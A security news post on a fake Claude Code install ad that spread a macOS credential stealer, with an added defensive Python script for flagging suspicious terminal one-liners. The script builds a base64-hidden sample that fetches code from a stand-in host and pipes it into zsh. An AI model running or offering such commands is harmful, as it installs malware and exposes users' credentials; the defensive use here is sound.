Cyber Web Spider Blog – News

Google Ad Used to Spread macOS Credential-Stealing Malware


Posted on July 1, 2026 By CWS

A Google-sponsored advertisement posing as Anthropic’s Claude Code CLI has been identified as delivering a macOS credential-stealing malware named “MacSync Stealer.” This malicious software also targets Ledger Live and Ledger Wallet applications to extract cryptocurrency seed phrases.

Uncovering the Malicious Campaign

Researchers at Beelzebub Labs discovered this campaign through their threat intelligence platform, Caronte, following the submission of a suspicious terminal command for analysis. The deceptive ad appeared when users searched for “claude code mac install,” placing it above legitimate search results.

When clicked, users were directed to a counterfeit installation page on sites.google.com, designed to imitate Anthropic’s branding. This page falsely claimed over 12 million downloads and provided a one-click copy button for a harmful terminal command.

Technical Tactics Employed

The attackers chose Google Sites because it renders its content through JavaScript, which made the page invisible to automated security scanners. The browsers of human visitors, however, executed the script and loaded the fake page. Trusted domains like sites.google.com also often bypass security checks, making this tactic particularly effective.

To deceive less experienced users, the page included a “New to Terminal?” guide, leading them through a fake installation process that normalized entering an admin password. This primed victims to comply with subsequent phishing prompts.

Detailed Breakdown of the Attack

The attack unfolded in six interconnected stages, from the ad click to full credential theft and potential wallet hijacking. These stages included a fake install page, a malicious terminal command, and a fake password prompt that captured the Mac login password.

Posing as a System Preferences prompt, the malware captured the password, which let it access encrypted keychains and browser credentials. For users with Ledger applications installed, the malware replaced app code, leading to persistent wallet hijacking.

Security Implications and Recommendations

Beelzebub Labs reported the malicious ad to Google, resulting in its removal within 24 hours. However, attackers are known to frequently change URLs to evade detection. Developers are advised to download tools directly from official sources and view any encoded terminal commands with suspicion.

Users who suspect exposure should change their Mac passwords and rotate browser-stored credentials. Recognizing and avoiding these tactics can significantly reduce the risk of credential and data theft.
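
The advice to treat encoded terminal commands with suspicion can be applied before anything is pasted into Terminal. The Python script below is an added example, not code from Beelzebub Labs or from the campaign: it flags pipe-to-interpreter and decode steps, checks download hosts against a list you control, and decodes base64 runs so the hidden text can be read. The sample command, the `TRUSTED_HOSTS` placeholder and all function names are constructed for illustration.

```python
import base64
import re
from urllib.parse import urlparse

# Placeholder: the download host you verified in the vendor's own documentation.
TRUSTED_HOSTS = {"downloads.vendor.example"}

INTERPRETERS = r"(?:(?:ba|z|da|k)?sh|osascript|python3?|perl|ruby)"
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(?:sudo\s+)?(?:/\S*/)?" + INTERPRETERS + r"\b")
DECODE_STEP = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b|\bxxd\s+-r\b")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL = re.compile(r"https?://[^\s'\"|;)]+")

# Constructed sample, not the command from the campaign: the visible text looks
# like an installer line while the real action is hidden in base64.
HIDDEN = "curl -fsSL https://files.untrusted.example/stage | zsh"
SAMPLE = f"echo '{base64.b64encode(HIDDEN.encode()).decode()}' | base64 -D | zsh"


def decode_runs(command):
    """Return readable text hidden in base64-looking runs of the command."""
    readable = []
    for run in B64_RUN.findall(command):
        try:
            padded = run + "=" * (-len(run) % 4)
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except ValueError:  # not base64, or not text
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            readable.append(text)
    return readable


def triage(command, depth=0):
    """List the reasons a copied one-liner should not be pasted into Terminal."""
    findings = []
    if PIPE_TO_INTERPRETER.search(command):
        findings.append("pipes data straight into an interpreter")
    if DECODE_STEP.search(command):
        findings.append("decodes an encoded payload at run time")
    for url in URL.findall(command):
        host = urlparse(url).hostname or ""
        if host not in TRUSTED_HOSTS:
            findings.append(f"fetches from untrusted host: {host}")
    if depth < 3:  # payloads may be encoded more than once
        for hidden in decode_runs(command):
            findings.append(f"hidden text: {hidden!r}")
            findings += [f"(decoded) {f}" for f in triage(hidden, depth + 1)]
    return findings
```

Calling `triage(SAMPLE)` returns five findings, including the decoded download line and its untrusted host; an empty list means only that none of these patterns matched, not that the command is safe.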
